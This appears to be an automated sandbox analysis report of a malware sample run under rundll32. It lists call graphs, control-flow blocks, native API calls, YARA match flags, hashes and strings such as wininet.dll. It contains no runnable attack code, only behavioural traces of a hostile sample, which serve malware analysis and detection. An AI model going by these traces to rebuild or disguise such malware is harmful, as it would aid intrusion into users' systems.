LdrInitializeThunk 29804->29937 29922 25c7a80 29805->29922 29938 25c84e0 LdrLoadDll 29806->29938 29810 25bb19d 29810->29827 29925 25b7630 29810->29925 29811 25bb23c 29939 25bad40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 29811->29939 29813 25bb260 29825 25bb2ad 29813->29825 29940 25c8510 LdrLoadDll 29813->29940 29818 25bb27e 29818->29825 29941 25c85a0 LdrLoadDll 29818->29941 29819 25bb2bb 29820 25c8be0 2 API calls 29819->29820 29821 25bb2c5 29820->29821 29823 25c8be0 2 API calls 29821->29823 29824 25bb2cf 29823->29824 29826 25b7630 3 API calls 29824->29826 29824->29827 29942 25c8570 LdrLoadDll 29825->29942 29826->29827 29827->29710 29829 25bd813 29828->29829 29830 25bd83e 29829->29830 30016 25c85e0 29829->30016 29830->29710 29832->29710 29833->29710 29835 25bd64d 29834->29835 29841 25c8710 29835->29841 29838 25bd695 29838->29772 29842 25c872c 29841->29842 29843 25c9700 LdrLoadDll 29841->29843 29851 46199a0 LdrInitializeThunk 29842->29851 29843->29842 29844 25bd68e 29844->29838 29846 25c8760 29844->29846 29847 25c877c 29846->29847 29848 25c9700 LdrLoadDll 29846->29848 29852 4619780 LdrInitializeThunk 29847->29852 29848->29847 29849 25bd6be 29849->29772 29851->29844 29852->29849 29854 25ca850 2 API calls 29853->29854 29855 25c7fe7 29854->29855 29874 25b85a0 29855->29874 29857 25c8002 29858 25c8029 29857->29858 29859 25c8040 29857->29859 29860 25ca680 2 API calls 29858->29860 29862 25ca600 2 API calls 29859->29862 29861 25c8036 29860->29861 29861->29775 29863 25c807a 29862->29863 29864 25ca600 2 API calls 29863->29864 29865 25c8093 29864->29865 29871 25c8334 29865->29871 29880 25ca640 LdrLoadDll 29865->29880 29867 25c8319 29868 25c8320 29867->29868 29867->29871 29869 25ca680 2 API calls 29868->29869 29870 25c832a 29869->29870 29870->29775 29872 25ca680 2 API calls 29871->29872 29873 25c8389 29872->29873 29873->29775 29875 25b85c5 29874->29875 29876 25b9f70 LdrLoadDll 29875->29876 29877 25b85f8 29876->29877 29879 25b861d 29877->29879 29881 25bb770 
29877->29881 29879->29857 29880->29867 29882 25bb79c 29881->29882 29883 25c8930 LdrLoadDll 29882->29883 29884 25bb7b5 29883->29884 29885 25bb7bc 29884->29885 29892 25c8970 29884->29892 29885->29879 29889 25bb7f7 29890 25c8be0 2 API calls 29889->29890 29891 25bb81a 29890->29891 29891->29879 29893 25c9700 LdrLoadDll 29892->29893 29894 25c898c 29893->29894 29900 4619710 LdrInitializeThunk 29894->29900 29895 25bb7df 29895->29885 29897 25c8f60 29895->29897 29898 25c9700 LdrLoadDll 29897->29898 29899 25c8f7f 29897->29899 29898->29899 29899->29889 29900->29895 29943 25bc1e0 29901->29943 29903 25bd107 29904 25bd120 29903->29904 29956 25b3fb0 29903->29956 29906 25ca850 2 API calls 29904->29906 29907 25bd12e 29906->29907 29907->29780 29908 25bd11a 29983 25c7900 29908->29983 29911 25b8a7b 29910->29911 29912 25bd4b0 3 API calls 29911->29912 29918 25b8b9b 29911->29918 29913 25b8b7c 29912->29913 29914 25b8baa 29913->29914 29915 25b8b91 29913->29915 29916 25c8be0 2 API calls 29913->29916 29914->29783 30015 25b6230 LdrLoadDll 29915->30015 29916->29915 29918->29783 29920 25bb0e0 29919->29920 29921 25c9700 LdrLoadDll 29919->29921 29920->29790 29920->29791 29920->29827 29921->29920 29923 25bd800 2 API calls 29922->29923 29924 25c7ab2 29922->29924 29923->29924 29924->29810 29926 25b7648 29925->29926 29927 25b9f70 LdrLoadDll 29926->29927 29928 25b7663 29927->29928 29929 25c42d0 LdrLoadDll 29928->29929 29930 25b7673 29929->29930 29931 25b76ad 29930->29931 29932 25b767c PostThreadMessageW 29930->29932 29931->29710 29932->29931 29933 25b7690 29932->29933 29934 25b769a PostThreadMessageW 29933->29934 29934->29931 29935->29794 29936->29801 29937->29806 29938->29811 29939->29813 29940->29818 29941->29825 29942->29819 29944 25bc213 29943->29944 29988 25ba580 29944->29988 29946 25bc225 29992 25ba6f0 29946->29992 29948 25bc243 29949 25ba6f0 LdrLoadDll 29948->29949 29950 25bc259 29949->29950 29951 25bd630 3 API calls 29950->29951 29952 25bc27d 29951->29952 29953 25bc284 29952->29953 29954 
25ca890 2 API calls 29952->29954 29953->29903 29955 25bc294 29954->29955 29955->29903 29957 25b3fdc 29956->29957 29958 25bb770 3 API calls 29957->29958 29960 25b40b3 29958->29960 29959 25b4632 29959->29908 29960->29959 29995 25ca8d0 29960->29995 29962 25b411e 29963 25ba2c0 LdrLoadDll 29962->29963 29964 25b42a4 29963->29964 29965 25ba2c0 LdrLoadDll 29964->29965 29966 25b42c8 29965->29966 29999 25bb830 29966->29999 29970 25b4363 29971 25b4429 29970->29971 29972 25bb830 2 API calls 29970->29972 29974 25ca600 2 API calls 29971->29974 29973 25b4402 29972->29973 29973->29971 29976 25c8870 2 API calls 29973->29976 29975 25b448d 29974->29975 29977 25ca600 2 API calls 29975->29977 29976->29971 29978 25b44a6 29977->29978 29978->29959 29979 25ba2c0 LdrLoadDll 29978->29979 29980 25b44e4 29979->29980 29981 25ba190 LdrLoadDll 29980->29981 29982 25b4596 29981->29982 29982->29908 29984 25c7921 29983->29984 29985 25c42d0 LdrLoadDll 29983->29985 29986 25c7947 29984->29986 29987 25c7934 CreateThread 29984->29987 29985->29984 29986->29904 29987->29904 29989 25ba5a7 29988->29989 29990 25ba2c0 LdrLoadDll 29989->29990 29991 25ba5e3 29990->29991 29991->29946 29993 25ba2c0 LdrLoadDll 29992->29993 29994 25ba709 29993->29994 29994->29948 29996 25ca8dd 29995->29996 29997 25c42d0 LdrLoadDll 29996->29997 29998 25ca8f0 29997->29998 29998->29962 30000 25bb855 29999->30000 30008 25c87e0 30000->30008 30003 25c8870 30004 25c9700 LdrLoadDll 30003->30004 30005 25c888c 30004->30005 30014 4619650 LdrInitializeThunk 30005->30014 30006 25c88ab 30006->29970 30009 25c9700 LdrLoadDll 30008->30009 30010 25c87fc 30009->30010 30013 46196d0 LdrInitializeThunk 30010->30013 30011 25b433c 30011->29970 30011->30003 30013->30011 30014->30006 30015->29918 30017 25c85fc 30016->30017 30018 25c9700 LdrLoadDll 30016->30018 30021 4619840 LdrInitializeThunk 30017->30021 30018->30017 30019 25c860b 30019->29830 30021->30019 30023 25c77d0 30024 25ca600 2 API calls 30023->30024 30026 25c780b 30024->30026 30025 25c78ec 
30026->30025 30027 25b9f70 LdrLoadDll 30026->30027 30028 25c7841 30027->30028 30029 25c42d0 LdrLoadDll 30028->30029 30031 25c785d 30029->30031 30030 25c7870 Sleep 30030->30031 30031->30025 30031->30030 30034 25c7400 LdrLoadDll 30031->30034 30035 25c7600 LdrLoadDll 30031->30035 30034->30031 30035->30031

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 573 25c8a6b-25c8a6f 574 25c8ac6-25c8b01 call 25c9700 NtCreateFile 573->574 575 25c8a71-25c8a86 573->575 577 25c8a8c-25c8aa9 575->577 578 25c8a87 call 25c9700 575->578 578->577
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,025C4037,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,025C4037,00000000,00000005,00000060,00000000,00000000), ref: 025C8AFD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: b42823926d532e25a45e9a32b2661f906586ba0ef2d8c31884a6c700e2bb6f91
                                                                                            • Instruction ID: fb43f4b0a88a573a7f6aa1f6eae159060571d0ca7bf0f9115646daf183a45fac
                                                                                            • Opcode Fuzzy Hash: b42823926d532e25a45e9a32b2661f906586ba0ef2d8c31884a6c700e2bb6f91
                                                                                            • Instruction Fuzzy Hash: 4411E5B2204109AFCB08DF98DC85DEB77AEAF8C714F148558FA0D97241D630EC11CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 607 25c8ab0-25c8b01 call 25c9700 NtCreateFile
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00000005,00000000,025C4037,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,025C4037,00000000,00000005,00000060,00000000,00000000), ref: 025C8AFD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: bd50952d6a5d74a00dbf8b16fe40b879aa92eaea86fb6d31d2479a21db387ed5
                                                                                            • Instruction ID: 744b5b3382616a89f77b13df5329ea4c5ab8799a7bb71fdc853d43080b2786c1
                                                                                            • Opcode Fuzzy Hash: bd50952d6a5d74a00dbf8b16fe40b879aa92eaea86fb6d31d2479a21db387ed5
                                                                                            • Instruction Fuzzy Hash: 72F0B2B2211108AFCB48CF88DC84EEB37EDAF8C754F118208FA0D97240D630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 611 25c8b5a-25c8ba9 call 25c9700 NtReadFile
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(025C41F2,5D0515AF,FFFFFFFF,025C3EB1,00000206,?,025C41F2,00000206,025C3EB1,FFFFFFFF,5D0515AF,025C41F2,00000206,00000000), ref: 025C8BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: c8d93374614ac6f3d413333453485ec7fc83a504f1ac39fdbd31d04127d6c400
                                                                                            • Instruction ID: 4a877f431309cf8da1a08e22da470fc1b9604d1fc3816bc92f589371daf678ee
                                                                                            • Opcode Fuzzy Hash: c8d93374614ac6f3d413333453485ec7fc83a504f1ac39fdbd31d04127d6c400
                                                                                            • Instruction Fuzzy Hash: 37F0ECB6200108AFCB14DF99DC85DEB77A9EF8C354F158258F94DD7251D630E811CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(025C41F2,5D0515AF,FFFFFFFF,025C3EB1,00000206,?,025C41F2,00000206,025C3EB1,FFFFFFFF,5D0515AF,025C41F2,00000206,00000000), ref: 025C8BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 4f12b0cdba007ce0cf7b2678ba6d95ef09f50b31a4dbc7e195c84ade265fd998
                                                                                            • Instruction ID: 85acac4e3ff2914368a0e02ca996162b67ffc79731790eb502e5f17d507a6cbf
                                                                                            • Opcode Fuzzy Hash: 4f12b0cdba007ce0cf7b2678ba6d95ef09f50b31a4dbc7e195c84ade265fd998
                                                                                            • Instruction Fuzzy Hash: FBF0A4B6210108AFCB14DF89DC84EEB77ADAF8C754F158258FA0D97241D630E811CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,025B2D11,00002000,00003000,00000004), ref: 025C8CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,025B2D11,00002000,00003000,00000004), ref: 025C8CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • NtClose.NTDLL(025C41D0,00000206,?,025C41D0,00000005,FFFFFFFF), ref: 025C8C05
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • NtClose.NTDLL(025C41D0,00000206,?,025C41D0,00000005,FFFFFFFF), ref: 025C8C05
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5500be09ceacd4fc8cf2801826aecf52fc7927c92b8b9bbe87ca61577f1daf34
                                                                                            • Instruction ID: 5e58cae27a230f08c94e55c514d8abe01410b3ee60cb4ae9950184783a91c09f
                                                                                            • Opcode Fuzzy Hash: 5500be09ceacd4fc8cf2801826aecf52fc7927c92b8b9bbe87ca61577f1daf34
                                                                                            • Instruction Fuzzy Hash: 8A9002B130149812F1106559850574A000997D0355F65C411A8415658D96D5D8917561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 82d39e9c8afc4800deb19cd3f6dc5b949f720fc1bd1cbcdd8bae9f01a11227ff
                                                                                            • Instruction ID: cc8a03b4430e2e43e85c5757e7d9423e76f96b0df5163ea1989d5bf644e8238e
                                                                                            • Opcode Fuzzy Hash: 82d39e9c8afc4800deb19cd3f6dc5b949f720fc1bd1cbcdd8bae9f01a11227ff
                                                                                            • Instruction Fuzzy Hash: B39002B130141852F10065594505B46000997E0355F61C016A4115654D9655D8517961
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6311c207f87860e0c498b4367712e6b7dbadde8dd1af1675bee8faadca14b0b3
                                                                                            • Instruction ID: 2c307ef81d99d4ffb15f9dffd4b47a9e302ff40ecde8e9ef9b06b2b1aa00d632
                                                                                            • Opcode Fuzzy Hash: 6311c207f87860e0c498b4367712e6b7dbadde8dd1af1675bee8faadca14b0b3
                                                                                            • Instruction Fuzzy Hash: C69002B130141412F10069995509646000997E0355F61D011A9015555ED6A5D8917571
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 02b8b627417b74ea70f8307834a80d90811435a9aee855f389d6ac79a5976802
                                                                                            • Instruction ID: f075669b05b6a4dcef345c2a87d3f298795d687ed3cca40a9fbaf1866bcfaf90
                                                                                            • Opcode Fuzzy Hash: 02b8b627417b74ea70f8307834a80d90811435a9aee855f389d6ac79a5976802
                                                                                            • Instruction Fuzzy Hash: FB9002B131155412F11065598505706000997D1255F61C411A4815558D96D5D8917562
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 892eecb51f62b27e61431ebec964495a2c9e4649bc21fa325719c7e21ab62a5d
                                                                                            • Instruction ID: 2f3f16d8ed6334dd1b468854737dbb42b11e32434084aacd70a4d83235513bbf
                                                                                            • Opcode Fuzzy Hash: 892eecb51f62b27e61431ebec964495a2c9e4649bc21fa325719c7e21ab62a5d
                                                                                            • Instruction Fuzzy Hash: 829002A931341012F1807559550960A000997D1256FA1D415A4006558CD955D8696761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 297 25c77d0-25c7812 call 25ca600 300 25c78ec-25c78f2 297->300 301 25c7818-25c7868 call 25ca6d0 call 25b9f70 call 25c42d0 297->301 308 25c7870-25c7881 Sleep 301->308 309 25c78e6-25c78ea 308->309 310 25c7883-25c7889 308->310 309->300 309->308 311 25c788b-25c78b1 call 25c7400 310->311 312 25c78b3-25c78d4 call 25c7600 310->312 316 25c78d9-25c78dc 311->316 312->316 316->309
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000007D0), ref: 025C7878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: 398156c83f2bc72fe6e6c7ef956510dc9abef3d4df3efc12ac588fa808278428
                                                                                            • Instruction ID: 3d2c9d55f907c1ca608edfd5babf21b382bcacdfb75fc991170a0fac9fb20881
                                                                                            • Opcode Fuzzy Hash: 398156c83f2bc72fe6e6c7ef956510dc9abef3d4df3efc12ac588fa808278428
                                                                                            • Instruction Fuzzy Hash: 6C31ACB6A01605AFD711DFA4C8A0FA7BBB8BF88704F10811DF65A5B640E770A445CFE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 317 25c77cc-25c7812 call 25ca600 321 25c78ec-25c78f2 317->321 322 25c7818-25c7868 call 25ca6d0 call 25b9f70 call 25c42d0 317->322 329 25c7870-25c7881 Sleep 322->329 330 25c78e6-25c78ea 329->330 331 25c7883-25c7889 329->331 330->321 330->329 332 25c788b-25c78b1 call 25c7400 331->332 333 25c78b3-25c78d4 call 25c7600 331->333 337 25c78d9-25c78dc 332->337 333->337 337->330
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000007D0), ref: 025C7878
